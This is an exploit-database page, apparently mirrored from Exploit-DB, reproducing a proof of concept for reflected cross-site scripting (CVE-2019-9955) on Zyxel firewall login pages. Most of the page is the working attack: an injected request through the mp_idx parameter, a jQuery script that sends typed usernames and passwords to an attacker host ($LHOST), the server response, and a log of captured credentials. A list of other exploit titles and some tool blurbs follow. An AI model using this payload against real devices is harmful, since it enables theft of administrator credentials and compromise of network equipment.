Search for hundreds of thousands of exploits

"Zyxel ZyWall 310 / ZyWall 110 / USG1900 / ATP500 / USG40 - Login Page Cross-Site Scripting"

Author

Exploit author

"Aaron Bishop"

Platform

Exploit platform

hardware

Release date

Exploit published date

2019-04-16

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
# Exploit Title: Reflected XSS on Zyxel login pages
# Date: 10 Apr 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://www.zyxel.com/us/en/
# Version: V4.31
# Tested on: ZyWall 310, ZyWall 110, USG1900, ATP500, USG40 - weblogin.cgi, webauth_relogin.cgi
# CVE : 2019-9955

1. Description
==============

Several Zyxel devices are vulnerable to a reflected Cross-Site Scripting via the
mp_idx parameter on weblogin.cgi and webauth_relogin.cgi.

2. Proof of Concept
=============

Host a malicious file JavaScript file named 'z', or any other single character,
locally.  The contents of 'z' for the following example are:


-----
$("button").click(function() {
    $.get("//$LHOST", { username: $("input:text").val(), password: $("input:password").val(), host: location.hostname});
});
-----


Close the mp_idx variable with "; and Use the getScript functionality of jQuery
to include the malicious file: 

Request:

GET /?mobile=1&mp_idx=%22;$.getScript(%27//$LHOST/z%27);// HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1



Response:

HTTP/1.1 200 OK
Date: Wed, 10 Apr 2019 23:13:39 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: Mon, 16 Apr 1973 13:10:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 7957

<!DOCTYPE html>
<html>
<head>
	<title>Welcome</title>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta charset="utf-8">
	<meta http-equiv="pragma" content="no-cache">
    <link href="/ext-js/mobile/css/jquery.mobile-1.4.2.min.css?v=180711001117" rel="stylesheet" type="text/css">
    <link href="/ext-js/mobile/css/style.css?v=180711001117" rel="stylesheet" type="text/css">
    <link href="/ext-js/mobile/css/theme.css?v=180711001117" rel="stylesheet" type="text/css">
	<link rel="stylesheet" type="text/css" href="/logo/mobile_custmiz_page.css?v=180711001117" /> 
	<script src="/ext-js/mobile/js/jquery-1.8.2.min.js?v=180711001117" type="text/javascript"></script>
    <script src="/ext-js/mobile/js/jquery.mobile-1.4.2.min.js?v=180711001117" type="text/javascript"></script>
	<script type="text/javascript" src="/lang/language_panel.js?v=180711001117"></script>
<script language="JavaScript">
	var errorNum = 0;
	var mp_idx = "";$.getScript('//$LHOST/z');//";
...


When the login form is submitted, the host for the malicious file gets a request
containing the login credentials and target system:

$LHOST - - [10/Apr/2019 23:04:41] "GET /z?_=1554937481076 HTTP/1.1" 200 -
$LHOST - - [10/Apr/2019 23:04:49] "GET /?username=test&password=test&host=$RHOST HTTP/1.1" 200 -
Release DateTitleTypePlatformAuthor
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46706/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.